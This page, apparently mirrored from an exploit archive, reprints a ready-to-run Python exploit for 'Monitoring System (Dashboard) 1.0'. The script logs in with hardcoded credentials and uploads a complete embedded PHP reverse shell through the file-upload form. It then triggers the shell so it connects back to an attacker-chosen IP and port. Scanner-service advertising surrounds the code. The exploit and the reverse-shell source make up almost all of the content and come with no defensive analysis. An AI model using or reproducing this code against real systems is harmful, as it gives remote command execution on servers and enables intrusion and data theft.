monitoring system (dashboard) 1.0 file upload rce (authenticated)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & php vulnerability




Online Vulnerability Scanner Tools
monitoring system (dashboard) 1.0 file upload rce (authenticated) Code Code... 
				
# Exploit Title: Monitoring System (Dashboard) 1.0 - File Upload RCE (Authenticated)
# Exploit Author: Richard Jones
# Date: 2021-03-11
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34


# Usage. 
# Change Target_IP, REV_IP, REV_PORT to your own


import requests

def main():
        
    ##### Change info here #####
    TARGET_IP="127.0.0.1"
    REV_IP="127.0.0.1"
    REV_PORT=9999
    ############################

    LOGIN="/asistorage/login.php"
    MAILING_LIST="/asistorage/modules/random/index.php?view=add"
    UPLOAD_URL="/asistorage/modules/random/upload.php"
    VIEW_ITEM="/asistorage/modules/random/index.php"
    CALL_URL="/asistorage/modules/random/uploads/"



    s = requests.Session()

    def phpshell():
        return """
        <?php
// Copyright (c) 2020 Ivan Å incek
// v1.1
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
header('Content-Type: text/plain; charset=UTF-8');
class Shell {
    private $addr  = null;
    private $port  = null;
    private $os    = null;
    private $shell = null;
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $options = array(); // proc_open() options
    private $buffer  = 1024;    // read/write buffer size
    private $clen    = 0;       // command length
    private $error   = false;   // stream read/write error
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
            $this->os    = 'LINUX';
            $this->shell = '/bin/sh';
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
            $this->options['bypass_shell'] = true; // we do not want a shell within a shell
        } else {
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
            exit(0);
        }
    }
    private function daemonize() {
        set_time_limit(0); // do not impose the script execution time limit
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else {
            if (($pid = pcntl_fork()) < 0) {
                echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
            } else if ($pid > 0) {
                echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
                exit(0);
            } else if (posix_setsid() < 0) { // once daemonized you will no longer see the script's dump
                echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
            } else {
                echo "DAEMONIZE: Completed successfully!\n";
            }
        }
        umask(0); // set the file/directory permissions - 666 for files and 777 for directories
    }
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
        }
        return $data;
    }
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true;                            // set global error flag
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
        }
        return $bytes;
    }
    // read/write method for non-blocking streams
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            echo $data; // script's dump
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
        }
    }
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $size = fstat($input)['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT
            $size -= $this->offset($input, $iname, $this->clen);             // we do not like that
            $this->clen = 0;
        }
        $fragments = ceil($size / $this->buffer); // number of fragments to read
        $remainder = $size % $this->buffer;       // size of the last fragment if it is less than the buffer size
        while ($fragments && ($data = $this->read($input, $iname, $remainder && $fragments-- == 1 ? $remainder : $this->buffer)) && $this->write($output, $oname, $data)) {
            echo $data; // script's dump
        }
    }
    private function offset($stream, $name, $offset) {
        $total = $offset;
        while ($offset > 0 && $this->read($stream, $name, $offset >= $this->buffer ? $this->buffer : $offset)) { // discard the data from a stream
            $offset -= $this->buffer;
        }
        return $offset > 0 ? $total - $offset : $total;
    }
    public function run() {
        $this->daemonize();

        // ----- SOCKET BEGIN -----
        $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
        if (!$socket) {
            echo "SOC_ERROR: {$errno}: {$errstr}\n";
        } else {
            stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS

            // ----- SHELL BEGIN -----
            $process = proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options);
            if (!$process) {
                echo "PROC_ERROR: Cannot start the shell\n";
            } else {
                foreach ($pipes as $pipe) {
                    stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                }

                // ----- WORK BEGIN -----
                fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n");
                while (!$this->error) {
                    if (feof($socket)) { // check for end-of-file on SOCKET
                        echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                    } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running
                        echo "PROC_ERROR: Shell process has been terminated\n";   break;   // feof() does not work with blocking streams
                    }                                                                      // use proc_get_status() instead
                    $streams = array(
                        'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                        'write'  => null,
                        'except' => null
                    );
                    $num_changed_streams = stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS
                    if ($num_changed_streams === false) {
                        echo "STRM_ERROR: stream_select() failed\n"; break;
                    } else if ($num_changed_streams > 0) {
                        if ($this->os === 'LINUX') {
                            if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                            if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                            if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                        } else if ($this->os === 'WINDOWS') {
                            // order is important
                            if (in_array($socket, $streams['read'])) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                            if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                            if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                        }
                    }
                }
                // ------ WORK END ------

                foreach ($pipes as $pipe) {
                    fclose($pipe);
                }
                proc_close($process);
            }
            // ------ SHELL END ------

            fclose($socket);
        }
        // ------ SOCKET END ------

    }
}
// change the host address and/or port number as necessary
$reverse_shell = new Shell('OLDIP', OLDPORT);
$reverse_shell->Run();
?>"""

    def login(url,username, password):
        try:    
            data = {
                "uname":username,
                "upass":password,
                "btnlogin":""
            }
            
            r = s.post(url,data=data, verify=False)
            page = r.text
            if "Invalid Username or Password, please try again." in page:
                return False
            else:
                return True
        except :
            return False

    def uploadShell(url):
        s.get(f"{url}{MAILING_LIST}") # Call page
        
        fileData = {
        'uploaded_file':("rev.php",str(phpshell().replace("OLDIP", REV_IP).replace("OLDPORT", str(REV_PORT))).encode(), "application/octet-stream")}
        data={
        "pname":"",
        "pname":"a",
        'cutoff':'',
        'cutoff':'a',
        'projectname':'',
        'type':'a',
        'projectname':'',
        'dsend':'2029-03-19',
        'desc':'a',
        'MAX_FILE_SIZE':100000,
        'Uploader':'',
    }
        up_url=f"{url}{UPLOAD_URL}"        
        r = s.post(up_url, files=fileData,data=data, verify=False)
        if r.status_code == 200:
            print("shell uploaded")
        else:
            print("Shell upload failed")
            exit(0)
        r = s.get(f"{url}{VIEW_ITEM}")
        page = r.text
        DL_URL=page.split("download.php?filename=")[1].split("\">")[0]
        return DL_URL
        
#Login
    base_url=f"http://{TARGET_IP}"
    login_url=f"{base_url}{LOGIN}"
    b=login(login_url, "jim", "jim")
    if not b:
        print("Login failed, Try again...")
        exit(0)
    
#CAll shell
    base=f"{base_url}"
    CALL_URL_PART=uploadShell(base)
    c_url=f"{base}{CALL_URL}{CALL_URL_PART}"
    s.get(c_url)
    #Shell can be found at http:/TARGET//asistorage/modules/random/uploads/

if __name__ == "__main__":
    main()

Monitoring system (dashboard) 1.0 file upload rce (authenticated) Vulnerability / Exploit Source : Monitoring system (dashboard) 1.0 file upload rce (authenticated)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.